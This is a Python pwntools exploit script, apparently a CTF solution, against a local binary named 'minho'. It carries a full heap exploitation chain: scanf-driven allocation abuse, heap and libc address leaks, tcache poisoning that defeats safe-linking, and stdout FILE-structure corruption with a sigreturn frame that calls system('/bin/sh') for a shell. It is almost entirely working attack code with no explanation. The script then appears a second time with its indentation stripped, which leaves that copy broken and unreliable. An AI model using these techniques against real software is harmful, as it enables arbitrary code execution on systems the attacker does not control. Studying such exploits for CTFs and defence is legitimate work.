kungfulon/exp.py

## exp.py
from pwn import *

context.update(os='linux', arch='amd64')

r = process('./minho')
l = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def new(size, data, abuse_scanf=0):
    r.sendlineafter(b'> ', b'1')
    r.sendlineafter(b': ', b'0' * abuse_scanf + str(size).encode())
    r.sendafter(b': ', data)

def show():
    r.sendlineafter(b'> ', b'2')

def delete(abuse_scanf=0):
    r.sendlineafter(b'> ', b'0' * abuse_scanf + b'3')

def tcache(target, chunk):
    return p64(target ^ chunk >> 12)

new(1, b'A')
delete()
new(2, b'A')
delete()

new(1, b'A', 0x558)
delete()

for i in range(0x52e, 0x527, -1):
    new(1, b'A', i)
    delete()

for i in range(0x4fe, 0x4f7, -1):
    new(1, b'A', i)
    delete()

new(1, b'A' * 0x50)
show()
r.recvuntil(b': ')
r.recvn(0x50)
heap = (u64(r.recvn(5) + b'\x00\x00\x00') << 12) - 0x1000
log.info('heap = 0x%x', heap)
delete()

new(1, p64(0x0) * 3 + p64(0x31) + p64(heap + 0x12c0) * 2 + b'A' * 0x10 + p64(0x30) + p64(0x590))
delete()
new(2, b'A' * 0x50 + p64(0x90) + p64(0x30))
delete()
new(1, b'A' * 0x20)
show()
r.recvuntil(b': ')
r.recvn(0x20)
l.address = u64(r.recvn(6) + b'\x00\x00') - 0x219ce0
log.info('libc = 0x%x', l.address)
delete()
new(1, b'A' * 0x18 + p64(0x91))
delete()

delete(0x400)

new(1, b'\x00' * 0x18 + p64(0x91) + p64(l.address + 0x219d60) + p64(heap + 0x12d0) + p64(heap + 0x12c0) + p64(l.address + 0x219d60))
delete()
new(2, b'A')
delete()

new(1, b'\x00' * 0x18 + p64(0x81) + tcache(l.symbols['_IO_2_1_stdin_'], heap + 0x12c0))
delete()
new(2, b'\x00')
delete()

f = FileStructure()
new(2, f.read(l.symbols['_IO_2_1_stdout_'], 0x1000))

f = FileStructure()
f._IO_write_ptr = 0x1
f._lock = l.address + 0x21ba70
f._wide_data = l.symbols['_IO_2_1_stdout_'] + len(f)
f.vtable = l.symbols['_IO_wfile_jumps']

s = SigreturnFrame()
s['rip'] = l.symbols['system']
s['rdi'] = l.address + 0x1d8698 # /bin/sh
s['rbp'] = l.symbols['setcontext'] + 294
s['&fpstate'] = l.symbols['_IO_2_1_stdout_'] + len(f) + 0x10

r.sendafter(b'> ', bytes(f) + bytes(s))

r.interactive()
	from pwn import *

	context.update(os='linux', arch='amd64')

	r = process('./minho')
	l = ELF('/lib/x86_64-linux-gnu/libc.so.6')

	def new(size, data, abuse_scanf=0):
	r.sendlineafter(b'> ', b'1')
	r.sendlineafter(b': ', b'0' * abuse_scanf + str(size).encode())
	r.sendafter(b': ', data)

	def show():
	r.sendlineafter(b'> ', b'2')

	def delete(abuse_scanf=0):
	r.sendlineafter(b'> ', b'0' * abuse_scanf + b'3')

	def tcache(target, chunk):
	return p64(target ^ chunk >> 12)

	new(1, b'A')
	delete()
	new(2, b'A')
	delete()

	new(1, b'A', 0x558)
	delete()

	for i in range(0x52e, 0x527, -1):
	new(1, b'A', i)
	delete()

	for i in range(0x4fe, 0x4f7, -1):
	new(1, b'A', i)
	delete()

	new(1, b'A' * 0x50)
	show()
	r.recvuntil(b': ')
	r.recvn(0x50)
	heap = (u64(r.recvn(5) + b'\x00\x00\x00') << 12) - 0x1000
	log.info('heap = 0x%x', heap)
	delete()

	new(1, p64(0x0) * 3 + p64(0x31) + p64(heap + 0x12c0) * 2 + b'A' * 0x10 + p64(0x30) + p64(0x590))
	delete()
	new(2, b'A' * 0x50 + p64(0x90) + p64(0x30))
	delete()
	new(1, b'A' * 0x20)
	show()
	r.recvuntil(b': ')
	r.recvn(0x20)
	l.address = u64(r.recvn(6) + b'\x00\x00') - 0x219ce0
	log.info('libc = 0x%x', l.address)
	delete()
	new(1, b'A' * 0x18 + p64(0x91))
	delete()

	delete(0x400)

	new(1, b'\x00' * 0x18 + p64(0x91) + p64(l.address + 0x219d60) + p64(heap + 0x12d0) + p64(heap + 0x12c0) + p64(l.address + 0x219d60))
	delete()
	new(2, b'A')
	delete()

	new(1, b'\x00' * 0x18 + p64(0x81) + tcache(l.symbols['_IO_2_1_stdin_'], heap + 0x12c0))
	delete()
	new(2, b'\x00')
	delete()

	f = FileStructure()
	new(2, f.read(l.symbols['_IO_2_1_stdout_'], 0x1000))

	f = FileStructure()
	f._IO_write_ptr = 0x1
	f._lock = l.address + 0x21ba70
	f._wide_data = l.symbols['_IO_2_1_stdout_'] + len(f)
	f.vtable = l.symbols['_IO_wfile_jumps']

	s = SigreturnFrame()
	s['rip'] = l.symbols['system']
	s['rdi'] = l.address + 0x1d8698 # /bin/sh
	s['rbp'] = l.symbols['setcontext'] + 294
	s['&fpstate'] = l.symbols['_IO_2_1_stdout_'] + len(f) + 0x10

	r.sendafter(b'> ', bytes(f) + bytes(s))

	r.interactive()